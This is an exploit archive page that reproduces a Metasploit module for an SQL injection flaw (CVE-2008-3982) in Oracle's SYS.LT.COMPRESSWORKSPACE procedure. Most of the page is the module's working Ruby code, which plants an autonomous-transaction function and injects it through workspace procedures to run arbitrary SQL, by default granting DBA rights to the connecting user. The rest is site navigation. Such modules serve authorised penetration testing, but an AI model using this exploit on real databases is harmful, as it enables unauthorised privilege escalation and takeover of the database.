Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE: Posted Aug 31, 2024; Authored by Jay Turla | Site metasploit.com; This Metasploit module exploits an sql injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.; tags | exploit, sql injection; advisories | CVE-2008-3982; SHA-256 | 8d3bbc62256bcef0370fd324d79badfe6dada95158c7b728fcf20137808677d2; Download | Favorite | View

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',
      'Description'    => %q{
        This module exploits an sql injection flaw in the COMPRESSWORKSPACE
        procedure of the PL/SQL package SYS.LT. Any user with execute
        privilege on the vulnerable package can exploit this vulnerability.
      },
      'Author'         => [ 'CG' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-3982'],
          [ 'OSVDB', '49324'],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
        ],
      'DisclosureDate' => '2008-10-13'))

      register_options(
        [
          OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),
        ])
  end

  def run
    return if not check_dependencies

    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    cruft = Rex::Text.rand_text_alpha_upper(1)

    function = "
      CREATE OR REPLACE FUNCTION #{cruft}
      RETURN VARCHAR2 AUTHID CURRENT_USER
      AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
      EXECUTE IMMEDIATE '#{datastore['SQL']}';
      COMMIT;
      RETURN '#{cruft}';
      END;"

    package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"

    clean = "DROP FUNCTION #{cruft}"

    print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...")

    print_status("Sending function...")
    prepare_exec(function)

    begin
      prepare_exec(package1)
      prepare_exec(package2)
    rescue  => e
      if ( e.to_s =~ /No Data/ )
        print_status("Removing function '#{cruft}'...")
        prepare_exec(clean)
      else
        return
      end
    end

  end
end

Top Authors In Last 30 Days

Red Hat 232 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,120)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,142)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,780)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

Share This

Oracle DB SQL Injection Via SYS.LT.COMPRESSWORKSPACE

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems